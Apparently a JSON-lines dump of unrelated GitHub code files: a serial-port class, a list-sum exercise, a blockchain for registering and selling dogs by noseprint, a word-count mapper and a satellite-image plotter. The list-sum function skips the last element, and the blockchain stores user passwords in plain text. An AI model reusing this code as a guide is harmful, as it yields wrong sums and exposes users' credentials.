threading\n\n\"\"\"\nシリアル通信クラス\n\"\"\"\nclass SampleComm:\n # 初期化\n def __init__(self):\n # オープンフラグ\n self.isPortOpen = True\n # 受信データ\n self.recvData = bytearray()\n # イベント生成\n self.event = threading.Event()\n\n # データ受信待ち(タイムアウト付き[sec])\n def recv(self, timeout=3):\n # タイムアウト用時間取得\n time_start = time.time()\n time_end = time_start\n # スレッド待ちイベントクリア\n self.event.clear()\n # 受信データクリア\n self.recvData.clear()\n # 受信結果 True:成功 False:失敗(タイムアウト)\n result = False\n\n # データ受信待ち\n while not self.event.is_set():\n # タイムアウトチェック\n time_end = time.time()\n if (time_end - time_start > timeout):\n # データ送受信停止して失敗(タイムアウト)とする\n result = False\n self.stop()\n print(\"timeout:{0}sec\".format(timeout))\n break\n\n # 受信データ読み取り\n buff = self.comm.read()\n\n # 受信データ判定\n if len(buff) > 0:\n # 受信データ追加\n self.recvData.extend(buff)\n # (仮)\\nを受信済なら成功とする\n if (self.recvData.find(b'\\n')) >= 0:\n # データ送受信停止して成功とする\n result = True\n self.stop()\n break\n\n # 結果を返す\n return (result, self.recvData)\n\n # データ送信\n def send(self, data):\n self.comm.write(data)\n\n # データ送受信停止\n def stop(self):\n self.event.set()\n\n # シリルポートオープン\n def open(self, tty, baud='115200'):\n try:\n self.comm = serial.Serial(tty, baud, timeout=0.1)\n self.isPortOpen = True\n except Exception as e:\n self.isPortOpen = False\n\n return self.isPortOpen\n\n # シリアルポートクローズ(明示的に閉じる)\n def close(self):\n self.stop()\n if (self.isPortOpen):\n self.comm.close()\n self.isPortOpen = False\n\nif __name__ == \"__main__\":\n # シリアルを開く\n comm = SampleComm()\n comm.open('/dev/ttyUSB0', '115200')\n\n # データ送信\n comm.send('sample'.encode())\n # データ受信(タイムアウト=10sec)\n result, data = comm.recv(10)\n print(result)\n print(data)\n\n # シリアルを閉じる\n comm.close();\n","repo_name":"opckaiyo2/2021_ROV","sub_path":"test/serial/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33124051133","text":"# -*- coding = utf-8 -*-\n# @Time : 2020/7/1 22:56\n# @Author : EmperorHons\n# @File : Rookie047.py\n# @Software : PyCharm\n\"\"\"\nhttps://www.runoob.com/python3/python-sum-list.html\nPython 计算列表元素之和\n定义一个数字列表,并计算列表元素之和。\n例如: 输入 : [12, 15, 3, 10] 输出 : 40\n\"\"\"\n\nimport pysnooper\n\n\n@pysnooper.snoop()\ndef List_sum(List):\n s = 0\n for i in range(0, len(List) - 1):\n s += List[i]\n i += 1\n return s\n\n\nif __name__ == '__main__':\n List = [1, 5, 2, 44, 13, 26, 39, 57, 82]\n print(List_sum(List))","repo_name":"yusheng88/RookieInstance","sub_path":"Rookie047.py","file_name":"Rookie047.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72141760855","text":"\ndef return_day(num):\n week={\n 1:\"Sunday\",\n 2:\"Monday\",\n 3:\"Tuesday\",\n 4:\"Wednesday\",\n 5:\"Thursday\",\n 6:\"Friday\",\n 7:\"Saturday\"\n }\n if num>7 or num<1:\n return None\n else:\n return week[num]\n ","repo_name":"cpe342/PythonCourse","sub_path":"Functions/days_of_week.py","file_name":"days_of_week.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41685952456","text":"import hashlib\nimport json\nfrom time import time\nfrom time import sleep\nimport numpy as np\nimport urllib.parse\nimport requests\nfrom dogNoseprint import noseprintshot\nfrom merkleTree import get_merkle_root\nimport random\nimport cv2\nfrom collections import Counter\nfrom dataclasses import dataclass, asdict, astuple\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Hash import SHA256\nfrom Cryptodome.Signature import PKCS1_v1_5\nfrom AESCipher import AESCipher\n####### block generation & its principle\nclass Blockchain:\n def __init__(self):\n self.chain = []\n self.current_transactions = []\n self.nodes = set()\n self.new_block(previous_hash='1', proof=100)\n def new_block(self, proof, previous_hash=None):\n if previous_hash ==None:\n previous_hash = self.hash(self.chain[-1])\n block = {\n 'index' : len(self.chain) + 1,\n 'timestamp': time(),\n 'transactions': self.current_transactions,\n 'proof': proof,\n 'previous_hash': previous_hash,\n 'merkle_root': get_merkle_root(self.current_transactions)\n }\n self.current_transactions = []\n self.chain.append(block)\n return block\n \n # 트랜잭션 키와 값을 받아서 해당 트랜잭션을 출력하는 함수(키는 두개를 받을수 있고, 두개를 받을 경우 각각의 입력값이 \n # 등록된 값과 동일해야 트랜잭션을 반환. 아님 None을 반환한다.)\n def search_transaction(self,insertkey,insertvalues,insertkey2=None,insertvalues2=None):\n for i in range(1,len(self.chain)+1):\n # block들의 transaction을 조회\n block=self.chain[-i]\n transaction=block['transactions']\n for n in range(len(transaction)):\n try :\n value01=transaction[n][insertkey]\n except:\n continue\n if value01 == insertvalues:\n if insertkey2 == None:\n return transaction[n]\n else:\n try:\n if transaction[n][insertkey2] == insertvalues2:\n return transaction[n]\n else:\n continue\n except:\n continue\n return None\n # 해당 key에 대한 values가 존재하면 해당 모든 트랜잭션들을 리스트형태로 출력.\n def search_transaction_all(self,insertkey,insertvalues,insertkey2=None,insertvalues2=None):\n transaction_list = []\n checkkey1=insertkey\n checkvalue1=insertvalues\n # 트랜잭션의 모음으로 동적 리스트를 생성\n for i in range(1,len(self.chain)+1):\n # block들의 transaction을 조회\n block=self.chain[-i]\n transaction=block['transactions']\n for n in range(len(transaction)):\n try:\n value01=transaction[n][insertkey]\n except:\n continue\n if value01 == insertvalues:\n if insertkey2 == None:\n transaction_list.append(transaction[n])\n\n # insertkey2가 None으로 오직 하나의 키로 찾는 경우 insertkey에 입력한 값이 맞으면 해당 트랜잭션을 \n # 리스트에 추가\n else:\n try:\n if transaction[n][insertkey2] == insertvalues2:\n transaction_list.append(transaction[n])\n # 두 개의 키로 찾는 경우 insertkey02에 입력한 값이 맞는것까지 확인하여 해당 트랜잭션을 추가\n else :\n continue\n except:\n continue\n return transaction_list\n \n # 해당 key에 대한 values가 존재하면 해당 트랜잭션들을 출력. \n \n # Double Spending, 여기서는 이중 트랜잭션 생성 관련 문제를 해결하기 위한 함수\n def check_attack_double_standing(self,checktransactions):\n updatemychain=self.resolve_conflicts()\n # 자신의 체인을 최신 체인으로 업데이트한다.\n transactionlist =[]\n # 빈 트랜잭션 리스트를 생성\n for i, (key, value) in enumerate(checktransactions.items()):\n # 입력받은 트랜잭션 검증을 위한 키와 그에 해당되는 값을 순차대로 출력한다.\n transactionlist.extend(self.search_transaction_all(key,value))\n # 키와 값에 해당 되는 값들을 출력한다.\n for d in range(0,len(self.current_transactions)):\n print(self.current_transactions[d])\n # 키와 값이 중복되는 트랜잭션을 트랜잭션 큐안에서 찾는다.\n if value==self.current_transactions[d][key]:\n # 입력된 키에 대한 값이 존재하면 \n transactionlist.append(self.current_transactions[d])\n # 트랜잭션리스트에 추가한다.\n if len(transactionlist) < 1:\n return True\n # 중복된 트랜잭션이 없는것이므로 True를 반환\n b_count = []# 각 원소의 등장 횟수를 카운팅할 리스트\n b_tr = [] # 실제 카운팅 리스트 인덱스에 맞춰 넣어지는 트랜잭션 리스트\n for a in range(len(transactionlist)):\n if b_tr.count(transactionlist[a]) >= 1:\n b_count[b_tr.index(transactionlist[a])] += 1\n else :\n b_count.insert(a,1)\n b_tr.insert(a,transactionlist[a])\n new_b = [] # 중복 원소만 넣을 리스트\n for b in range(len(b_tr)):\n if b_count[b] >= len(checktransactions): # n회 이상 등장한 원소로도 변경 가능\n new_b.append(b_tr[b])\n if len(new_b) == 0:\n return True\n else:\n return False\n # 어떠한 트랜잭션도 중복되지 않을 때, True를 반환한다. \n def check_attack_double_simple(self,checktransactions):\n updatemychain=self.resolve_conflicts()\n # 자신의 체인을 최신 체인으로 업데이트한다.\n transactionlist =[]\n # 빈 트랜잭션 리스트를 생성\n for i, (key, value) in enumerate(checktransactions.items()):\n # 입력받은 트랜잭션 검증을 위한 키와 그에 해당되는 값을 순차대로 출력한다.\n transactionlist.extend(self.search_transaction_all(key,value))\n # 키와 값에 해당 되는 값들을 출력한다.\n for d in range(0,len(self.current_transactions)):\n print(self.current_transactions[d])\n # 키와 값이 중복되는 트랜잭션을 트랜잭션 큐안에서 찾는다.\n if value==self.current_transactions[d][key]:\n # 입력된 키에 대한 값이 존재하면 \n transactionlist.append(self.current_transactions[d])\n # 트랜잭션리스트에 추가한다.\n if len(transactionlist) < 1:\n return None\n b_count = []# 각 원소의 등장 횟수를 카운팅할 리스트\n b_tr = [] # 실제 카운팅 리스트 인덱스에 맞춰 넣어지는 트랜잭션 리스트\n for a in range(len(transactionlist)):\n if b_tr.count(transactionlist[a]) >= 1:\n b_count[b_tr.index(transactionlist[a])] += 1\n else :\n b_count.insert(a,1)\n b_tr.insert(a,transactionlist[a])\n new_b = [] # 확인할려는 조건을 만족하는 중복 트랜잭션만 넣을 리스트\n for b in range(len(b_tr)):\n if b_count[b] >= len(checktransactions): # n회 이상 등장한 원소로도 변경 가능\n new_b.append(b_tr[b])\n if len(new_b) == 0:\n return None\n else:\n return new_b\n # 어떠한 트랜잭션도 중복되지 않을 때, True를 반환한다. \n # 사용자가 해당 서비스를 이용한 분양시, 그 거래에 대한 트랜잭션\n def new_transaction_transaction(self, buyer, seller, dog_info, price, transactioncode):\n checktransaction = {\n 'seller' : seller,# 판매자\n 'dog_info' : dog_info # 강아지 정보 \n }\n sleep(random.randrange(1, 3))\n # 1~10사이의 sleep시간을 가진다.이는 랜덤하게 시간을 두고 검증하여 이중 트랜잭션 공격을 감지하기 위함이다.\n checkpara = self.check_attack_double_standing(checktransaction)\n # Double Spending Attack 을 검증한다\n if checkpara:\n createtransaction = {\n 'buyer':buyer,\n 'seller':seller,\n 'dog_info':dog_info,\n 'price': price,\n 'transactioncode':transactioncode,\n 'owner':None,\n 'idcode':None,\n 'idname':None,\n 'emailid':None,\n 'idpw':None,\n 'img_hash':None,\n 'hash_transaction_id':None\n }\n # 만약 검증하여 해당 값이 True로 반환된 경우\n self.current_transactions.append(createtransaction)\n # 해당 트랜잭션을 트랜잭션 큐에 등록한다.\n # 만약 어떠한 중복된 트랜잭션도 발견되지않았다면 \n return self.last_block['index']+1\n else :\n # 만약 검증에 실패한 경우, 공격이 들어온것으로 감지한다.\n return self.last_block['index']\n # 검증에 실패하였기 때문에 해당 트랜잭션은 무시된다.\n \n # 사용자가 서비스 가입시 사용자의 id와 비밀번호를 네트워크에 등록하는 함수\n def new_transaction_registerid(self,idcode,idname,emailid ,idpw,transactioncode,okaykey=False,setkey=None): \n checktransaction = {\n 'emailid' : emailid,# 이메일 아이디\n 'transactioncode' : transactioncode # 트랜잭션 코드\n }\n sleep(random.uniform(1, 3))\n # 1~10사이의 sleep시간을 가진다.이는 랜덤하게 시간을 두고 검증하여 이중 트랜잭션 공격을 감지하기 위함이다.\n checkpara = self.check_attack_double_standing(checktransaction)\n # Double Spending Attack 을 검증한다\n if checkpara:\n createtransaction = {\n 'buyer':None,\n 'seller':None,\n 'dog_info':None,\n 'price': None,\n 'transactioncode':transactioncode,\n 'owner':None,\n 'idcode':idcode,\n 'idname':idname,\n 'emailid':emailid,\n 'idpw':idpw,\n 'img_hash':None,\n 'hash_transaction_id':None\n }\n # 만약 검증하여 해당 값이 True로 반환된 경우\n self.current_transactions.append(createtransaction)\n # 해당 트랜잭션을 트랜잭션 큐에 등록한다.\n # 만약 어떠한 중복된 트랜잭션도 발견되지않았다면 \n return self.last_block['index']+1\n else :\n # 만약 검증에 실패한 경우, 공격이 들어온것으로 감지한다.\n return self.last_block['index']\n \n # 개의 정보로 저장하기 위한 함수 \n def get_dog_information(self,email_id, owner,name, sex, species,imgnosepath,key1,des1):\n keypoints_dict = []\n for kp in key1:\n kp_dict = {\n 'pt': (kp.pt[0], kp.pt[1]),\n 'size': kp.size,\n 'angle': kp.angle,\n 'response': kp.response,\n 'octave': kp.octave,\n 'class_id': kp.class_id\n }\n keypoints_dict.append(kp_dict)\n # 키포인트는 json으로 직렬화하기 위해서는 다음과 같이 딕셔너리로 변환해줄 필요가 있다.\n dog_info = {\n 'ownerid':email_id,#이메일 아이디(로그인 정보를 담고있는 범용DB와 연결되는 칼럼)\n 'owner':owner, # 소유자 이름\n 'name':name, # 강아지 이름\n 'sex' : sex, # 강아지 성별\n 'species': species, # 강아지 종\n 'imgnosepath': imgnosepath, # 이미지가 저장된 절대 경로,\n 'imagekey': keypoints_dict, # 이미지에 대한 특이점 key정보(리스트)\n 'imagedes': des1.tolist() # 특이점 key정보에 대한 key descriptor(어레이)\n }\n # 입력한 강아지 정보가 실제 체인에서 중복되는 정보가 있는지 확인\n\n # 해당 강아지 정보에 대한 중복성을 검사\n \n # GET으로 넘겨주는 정보 출력\n print('%s' %email_id) \n print('%s' %owner)\n print('%s' %sex)\n print('%s' %species)\n return dog_info\n # 개 정보 등록 함수 \n def dog_info_search(self,search_col,transactioncode):\n result_list = []\n append_tr = None\n checktransaction = {\n 'transactioncode' : transactioncode# 강아지 정보\n # 강아지 분양 정보(대기,분양)\n }\n checkpara = self.check_attack_double_simple(checktransaction)\n # 트랜잭션 코드가 강아지 정보 입력인 트랜잭션들을 리스트로 추출한다.\n if checkpara:\n for i in range(1,len(checkpara)):\n append_tr = None\n checktr=checkpara[-i]\n for key,value in search_col.items():\n if checktr.get(key) != value:\n append_tr = None\n break\n else:\n append_tr = checktr\n if append_tr != None:\n result_list.append(append_tr)\n return result_list\n \n def new_registration_dog (self, owner, dog_info,transactioncode):\n checktransaction = {\n 'owner' : owner,# 소유자 아이디\n 'dog_info' : dog_info, # 강아지 정보\n 'transactioncode' : transactioncode# 트랜잭션 코드\n # 강아지 정보 등록\n }\n sleep(random.uniform(1, 3))\n # 1~10사이의 sleep시간을 가진다.이는 랜덤하게 시간을 두고 검증하여 이중 트랜잭션 공격을 감지하기 위함이다.\n checkpara = self.check_attack_double_standing(checktransaction)\n if checkpara:\n createtransaction = {\n 'buyer':None,\n 'seller':None,\n 'dog_info':dog_info,\n 'price': None,\n 'transactioncode':transactioncode,\n 'owner':owner,\n 'idcode':None,\n 'idname':None,\n 'emailid':None,\n 'idpw':None,\n 'img_hash':None,\n 'hash_transaction_id':None\n }\n # 만약 검증하여 해당 값이 True로 반환된 경우\n self.current_transactions.append(createtransaction)\n # 해당 트랜잭션을 트랜잭션 큐에 등록한다.\n # 만약 어떠한 중복된 트랜잭션도 발견되지않았다면 \n return self.last_block['index'] + 1\n else:\n return self.last_block['index']\n \n # 해당 노드를 블록 체인 서버에 등록(풀노드)\n def register_node(self, address):\n parsed_url = urllib.parse.urlparse(address)\n # 가입 노드에 대한 \n self.nodes.add(parsed_url.netloc) # netloc attribute! network lockation\n # 유효한 체인인지 검사하는 함수.\n def valid_chain(self,chain):\n # 큐로 생각하여 가장 처음에 넣어진 체인의 블록은 체인의 맨 처음에 위치함.\n # 현재 블록(last_block)의 해쉬값과 다음 블록의 이전 해쉬값(previous_hash)값을 비교하여 해당 체인이 유효한지\n # 검사.\n last_block = chain[0]\n # 맨 처음에 제네시스 블록의 해시값과 이전 블록에서의 해시값을 비교하는 작업으로 시작됨으로 체인의 제네시스 블록을 \n # 해시값을 비교할 마지막 블록으로 설정\n current_index = 1\n # 해당 체인의 길이만큼 순차대로 검사.\n while current_index < len(chain):\n # 순차대로 체인의 블록\n block = chain[current_index]\n print('%s' % last_block)\n print('%s' % block)\n print(\"\\n---------\\n\")\n # check that the hash of the block is correct(해당 블록의 이전 해쉬값과 실제 업데이트되있는 마지막 블록의 \n # 해쉬값을 비교) 만약 맞지 않을 경우, 해당 체인은 유효하지 않음.\n if block['previous_hash'] != self.hash(last_block):\n return False\n # 현재 블록을 마지막 블록으로 바꾸고 다음 블록의 이전 해쉬값과 비교하며 검사\n last_block = block\n # 현재 체인의 인덱스를 1 높임.\n current_index += 1\n return True\n\n def request_update_chain(self):\n # 마이닝 이후 반드시 실행되는 함수. 마이닝을 하여 블록을 블록체인에 넣어둔 노드를 기준으로 모든 노드들을 \n # 자신이 추가한 블록까지 업데이트하는 함수\n neighbours = self.nodes\n # 해당 블록체인 네트워크에 등록된 다른 노드들\n for node in neighbours:\n tmp_url = 'http://' + str(node) + '/nodes/resolved'\n # 다른 노드들을 업데이트하도록 설정합니다.\n response = requests.get(tmp_url)\n if response.status_code == 200:\n # 다른 노드들이 자신의 체인으로 업데이트되었는지에 대한 응답을 받습니다.\n print(\"response : \"+response.json()['message'])\n # 각 노드들에 대한 메세지를 응답받아 그것을 출력하는 명령어\n print(\"All node update my chain\")\n # 모든 노드들이 업데이트되었다는 것을 출력하는 명령어\n return True\n \n def resolve_conflicts(self):\n # 블록 생성후 체인에 블록을 넣고나서 해당 노드에서의 체인이 유효한지를 검사하고 \n # 각 노드들의 체인을 검사하여 해당 노드의 체인의 길이가 더 길고, 유효한 체인이 검증되면\n neighbours = self.nodes\n # 해당 블록체인 네트워크에 등록된 다른 노드들\n new_chain = None\n # 업데이트될 체인\n # 처음에는 나의 체인이 제일 최신 체인으로 생각하여 None으로 초기화\n max_length = len(self.chain) \n # Our chain length \n for node in neighbours:\n # 각 다른 노드들의 체인을 비교해가며 다른 노드의 체인의 길이가 더 길고,\n # 그 노드의 체인이 유효하다면 해당 노드의 체인으로 업데이트한뒤, 응답으로 True를 return\n tmp_url = 'http://' + str(node) + '/chain'\n # 다른 노드들을 순차적으로 server파일에 있는 함수를 호출하여 해당 노드의 체인을 검사 것이며, \n # 체인을 응답받는 url\n response = requests.get(tmp_url)\n # 해당 노드의 체인의 길이를 응답받음.\n if response.status_code == 200:\n # 응답이 정상적으로 수행되었을 시, 조건문 진입\n length = response.json()['length']\n # 응답받은 json형식의 출력에서 해당 노드의 체인 길이를 length 지역 변수에 할당.\n chain = response.json()['chain']\n # 응답받은 json형식의 출력에서 해당 노드의 체인을 지역 변수에 할당\n if length > max_length and self.valid_chain(chain):\n # 만약 검사하는 노드의 체인 길이가 가장 최신의 체인이여서 해당 체인의 길이가 함수를 수행하는 노드의 \n # 체인 길이보다 길어진 경우, 그리고 해당 노드의 체인이 유효한 경우\n max_length = length\n # 가장 긴 길이를 해당 길이로 업데이트함.\n new_chain = chain\n # 해당 체인으로 업데이트할 체인에 할당.\n continue\n # new_chain이 바뀌었다면 다시 반복문으로 돌아감.\n if new_chain:\n # 최종적으로 나의 체인의 길이가 가장 긴 최신 체인을 new_chain에 할당한 경우\n self.chain = new_chain\n # new_chain의 체인을 나의 체인으로 업데이트함.\n return True\n # 해당 체인으로 대체되었으므로 True를 반환.\n return False\n # 만약 나의 체인이 가장 최신이였어서 new_chain이 None으로 남게된 경우\n # 나의 체인은 가장 최신의 체인으로 인증된 것이므로 False를 반환.\n\n # directly access from class, share! not individual instance use it\n @staticmethod\n # 위의 staticmethod는 blockchain이라는 클래스 밖의 전역에서도 해당 함수를 사용할 수 있도록 정의하기위해서 \n # 사용한 것이다.\n def hash(block):\n block_serialized = str(block)\n # json.dumps로 block이라는 딕셔너리 객체를 정렬하고나서 encode()로 하여금 문자열로 인코딩을 한다.\n return hashlib.sha256(block_serialized.encode()).hexdigest()\n # sha256 : 단방향 암호화 해시함수, 64자리(256bit) 암호화 문자열로 출력해준다.\n @property\n # 데코레이션 property : 해당 데코레이션의 함수는 자동으로 set과 get의 속성을 부여받는 객체가 된다.\n # 즉, 어떤 값을 출력할 때는 get함수, 어떤 값을 입력할 때는 set함수가 사용된다.\n def last_block(self):\n # 마지막 블록에 대한 객체 생성\n return self.chain[-1]\n # 체인의 마지막으로 넣어진 블록을 출력.\n def pow(self, last_proof):\n # 블록을 마이닝할 노드는 반드시 해당 노드가 마이닝할 능력이 됨을 증명해야한다. \n # 즉, 이에 대한 증명방식이 필요한데 이중하나가 pow(작업증명방식)이다.\n # pow(작업증명방식)은 마이닝을 요청후 해당 마이닝 노드에서 임의의 값들로 컴퓨터 자원을 이용하여 \n # 해당 블록 체인 네트워크에서 문제내는 어떠한 해시값을 추리할때, 해당 해시값을 맞추면\n # 해당 노드가 블록을 생성할 수 있다는 것을 증명했다는것으로 생각하여 해당 노드는 pow을 통과\n # 마이닝할 수 있게되는 것이다.\n proof = 0\n # 여기서 proof는 논스로 pow과정중엣 pow를 만족시키기 위해 계속 값이 올라간다. \n while self.valid_proof(last_proof, proof) is False:\n proof += 1\n return proof\n @staticmethod\n def valid_proof(last_proof, proof):\n # 고정된 블록의 해시 입력값 + 논스값을 입력하여 pow증명을 해내가는 과정의 함수\n guess = str(last_proof + proof).encode()\n # pow을 하는 노드는 먼저 블록의 해시 입력값 + 논스값을 문자열로 인코딩한다.\n guess_hash = hashlib.sha256(guess).hexdigest()\n # 위에서 인코딩한 문자열 값을 sha256해시함수에 입력값으로 입력하여 64자리 문자열을 입력받고 다시 hexdigest로\n # 해당 64자리 문자열을 16진수로 변환하여 추측pow값을 추출한다.\n return guess_hash[:4] == \"0000\" \n # 추측한 64자리가 만약 마지막 4자리가 0000이 되었을때, ","repo_name":"jyc0011/block_chain","sub_path":"blockchain/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":24191,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26052229358","text":"#!/usr/bin/python3\n\nimport sys\nfrom nltk.tokenize import word_tokenize\n\nfor line in sys.stdin:\n words = word_tokenize(line.strip())\n unique_words = list(set(words))\n for word in unique_words:\n print(f\"{word}\\t1\")\n","repo_name":"aditeyabaral/mapreduce-word2vec","sub_path":"src/mapper0.py","file_name":"mapper0.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16433122987","text":"from datetime import datetime\nfrom os import system\nfrom os.path import join\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.basemap import Basemap\n\nfrom _FileSearch import FileSearch\nfrom _Settings import Settings\nfrom colormap import Colormap\nfrom satellite import _sate_param\nfrom satellite.utils import (convert_time_format, get_multi_choices_template,\n is_ascii, safe_input, safe_str2value,\n unique_elements)\n\nDEBUG = False\n\nclass Satima:\n\n def __init__(self, FileSearch):\n self.fid = FileSearch.choice\n self.settings = Settings().settings\n self.fileclass = FileSearch.fileclass[self.fid['type'].upper()](self.fid)\n self.channel_flag = self.fileclass.get_channel_info()\n self.common_imoptions = {'Common':[], 'Composite':[]}\n self.spec_imoptions = {'WV强化':{'channels':[],'colormaps':[]}, 'IR强化':{'channels':[],'colormaps':[]}}\n self.raw = {}\n self.run()\n\n def run(self):\n self.get_options()\n self.get_choices()\n self.get_georange()\n self.get_size()\n self.get_title()\n self.set_map()\n self.processor()\n\n def get_options(self):\n wv_colormaps, ir_colormaps = Colormap.get_colormap_list()\n for imtype in self.channel_flag.keys():\n if self.channel_flag[imtype]:\n self.common_imoptions['Common'].append(imtype)\n for imtype in self.fileclass.composite.keys():\n composite_flag = [self.channel_flag[channel_require] for channel_require in self.fileclass.composite[imtype]]\n if all(composite_flag):\n self.common_imoptions['Composite'].append(imtype)\n for wv in self.fileclass.channels['wv']:\n if self.channel_flag[wv]:\n self.spec_imoptions['WV强化']['channels'].append(wv)\n self.spec_imoptions['WV强化']['colormaps'] = wv_colormaps\n for ir in self.fileclass.channels['ir']:\n if self.channel_flag[ir]:\n self.spec_imoptions['IR强化']['channels'].append(ir)\n self.spec_imoptions['IR强化']['colormaps'] = ir_colormaps\n\n def get_choices(self):\n count = 0\n choicedict = {}\n print()\n for imcategory, imtypes in self.common_imoptions.items():\n if len(imtypes) == 0:\n continue\n print('[{}]'.format(imcategory), end='')\n for imtype in imtypes:\n count += 1\n print(' {0:d}.{1:s}'.format(count, imtype.upper()), end='')\n choicedict[count] = (imcategory, imtype)\n print()\n for imcategory, iminfo in self.spec_imoptions.items():\n num_of_channels = len(iminfo['channels'])\n if num_of_channels == 0:\n continue\n print('[{}]'.format(imcategory), end='')\n for imchannel in iminfo['channels']:\n if num_of_channels > 1:\n print('[{}]'.format(imchannel), end='')\n for imtype in iminfo['colormaps']:\n count += 1\n print(' {0:d}.{1:s}'.format(count, imtype.upper()), end='')\n choicedict[count] = (imchannel, imtype)\n print()\n raw_choices = get_multi_choices_template(choicedict.keys(), '输入要制作的图像种类:', sort=True)\n self.choices = [choicedict[choice] for choice in raw_choices]\n print()\n\n def get_georange(self):\n if 'AUTOGEO' in self.fid.get('flag', []):\n self.georange = self.fileclass.get_auto_georange()\n return\n while True:\n latmin = safe_input('请输入最南纬度: ')\n latmax = safe_input('请输入最北纬度: ')\n lonmin = safe_input('请输入最西经度: ')\n lonmax = safe_input('请输入最东经度: ')\n if lonmin < 0:\n lonmin += 360\n if lonmax < 0:\n lonmax += 360\n if latmin >= latmax:\n print('纬度无效。')\n continue\n if lonmin >= lonmax:\n print('经度无效。')\n continue\n if not self.fileclass.remap:\n saterange = _sate_param._data_[self.fid['sate']]['georange']\n if latmax > saterange[0] or latmin < saterange[1] or lonmax > saterange[2] or lonmin < saterange[3]:\n print('输入范围无效。')\n print('参考范围:纬度 {}~{},经度 {}~{}'.format(saterange[1], saterange[0], saterange[3], saterange[2]))\n continue\n self.georange = (latmin, latmax, lonmin, lonmax)\n print()\n return\n\n def get_size(self):\n latmin, latmax, lonmin, lonmax = self.georange\n ratio = (latmax - latmin) / (lonmax - lonmin)\n print('默认图片大小为2000x{:d}。你可以自定义图片宽度,其高度将会按比例计算。'.format(int(2000*ratio)))\n width = safe_input('输入自定义图片宽度(500~4000),回车使用默认值:', func=int, vrange=(500, 4000), default=2000)\n self.dpi = width / Settings.widthsize\n self.figsize = (Settings.widthsize, Settings.widthsize*ratio)\n print()\n\n def get_title(self):\n if self.settings['switch']['title']:\n self.title = input('输入图片标题:')\n ascii_flag = is_ascii(self.title)\n self.title_font = self.settings['font']['title'] if ascii_flag else self.settings['font']['title_nonascii']\n self.title_weight = self.settings['font']['title_weight'] if ascii_flag else self.settings['font']['title_nonascii_weight']\n self.basic_info = convert_time_format(self.fid['time']) + ' {} '.format(self.fid['sate'])\n print()\n\n def get_colormap(self, choice):\n imcategory, imtype = choice\n if imcategory == 'Common':\n if imtype in self.fileclass.channels['ir'] or imtype in self.fileclass.channels['wv']:\n return 'gray_r'\n return 'gray'\n cmap = Colormap.get_colormap(imtype)\n if cmap == 0:\n print(imtype.upper()+'色阶存在问题。将使用灰度色阶。')\n return 'gray_r'\n return cmap\n\n def get_imtype(self, choice):\n imcategory, imtype = choice\n if imcategory in ('Common', 'Composite'):\n return imtype\n return imcategory + '-' + imtype\n\n def set_map(self):\n if self.settings['switch']['coastline'] or self.settings['switch']['borderline'] or self.settings['switch']['latlon']:\n latmin, latmax, lonmin, lonmax = self.georange\n resolution = self.settings['image']['resolution']\n if resolution not in ('c', 'l', 'i', 'h', 'f'):\n resolution = 'i'\n self.map = Basemap(projection='cyl', llcrnrlat=latmin, urcrnrlat=latmax, llcrnrlon=lonmin, urcrnrlon=lonmax, resolution=resolution)\n\n def get_imager_kwargs(self, choice):\n imcategory, imtype = choice\n if imcategory == 'Composite':\n return {}\n cmap = self.get_colormap(choice)\n if imcategory == 'Common':\n if imtype in self.fileclass.channels['vis']:\n return {'vmin': 0., 'vmax': 1., 'cmap':cmap}\n elif imtype in self.fileclass.channels['ir']:\n return {'vmin': -80., 'vmax': 50., 'cmap':cmap}\n if imcategory not in ('Common', 'Composite'):\n return {'vmin': -100., 'vmax': 50., 'cmap':cmap}\n return {}\n\n def find_corresponding_channel(self, choice):\n imcategory, imtype = choice\n if imcategory == 'Common':\n return (imtype,)\n if imcategory == 'Composite':\n return self.fileclass.composite[imtype]\n return (imcategory,)\n\n def get_required_channels(self):\n required_channels = []\n for choice in self.choices:\n channels = self.find_corresponding_channel(choice)\n required_channels.extend(list(channels))\n return unique_elements(required_channels)\n\n def clear_unnecessary_channel(self):\n required_channels = self.get_required_channels()\n to_be_del = []\n for channel in self.raw.keys():\n if channel not in required_channels:\n to_be_del.append(channel)\n for channel in to_be_del:\n del self.raw[channel]\n\n def load_channel(self, channel):\n if channel not in self.raw.keys():\n self.raw[channel] = self.fileclass.extract(channel, self.georange)\n return self.raw[channel]\n\n def load_channel_8bit(self, channel):\n data = self.load_channel(channel)\n if channel in self.fileclass.channels['vis']:\n return np.uint8(np.clip(data, 0, 1)*255)\n if channel in self.fileclass.channels['ir']:\n return np.uint8((np.clip(data, -100, 50) + 100) * (255/150))\n data_min, data_max = np.amin(data), np.amax(data)\n return np.uint8((data - data_min) * (255/(data_max - data_min)))\n\n def load_raw(self, choice):\n channel = self.find_corresponding_channel(choice)\n if len(channel) == 1:\n return self.load_channel(channel[0])\n elif self.fileclass.remap:\n return self.remap_rgb(channel)\n else:\n return self.merger(channel)\n\n def load_geocoord(self, choice):\n channel = self.find_corresponding_channel(choice)\n if len(channel) == 1:\n ch = channel[0]\n else:\n ch = channel[np.argmin([self.fileclass.resolution[c] for c in channel])]\n return self.fileclass.geocoord(ch)\n\n def load_masked_raw_geocoord(self, choice, _8bit=False):\n EDGE = 0.05\n if _8bit:\n raw = self.load_channel_8bit(choice[1])\n else:\n raw = self.load_raw(choice)\n lon, lat = self.load_geocoord(choice)\n print(np.mean(lon), np.amin(lon), np.amax(lon))\n latmin, latmax, lonmin, lonmax = self.georange\n bool_arr_ind = np.where((lat > latmin - EDGE) & (lat < latmax + EDGE) & (lon > lonmin - EDGE) & (lon < lonmax + EDGE))\n ymin, ymax = np.amin(bool_arr_ind[0]), np.amax(bool_arr_ind[0])\n xmin, xmax = 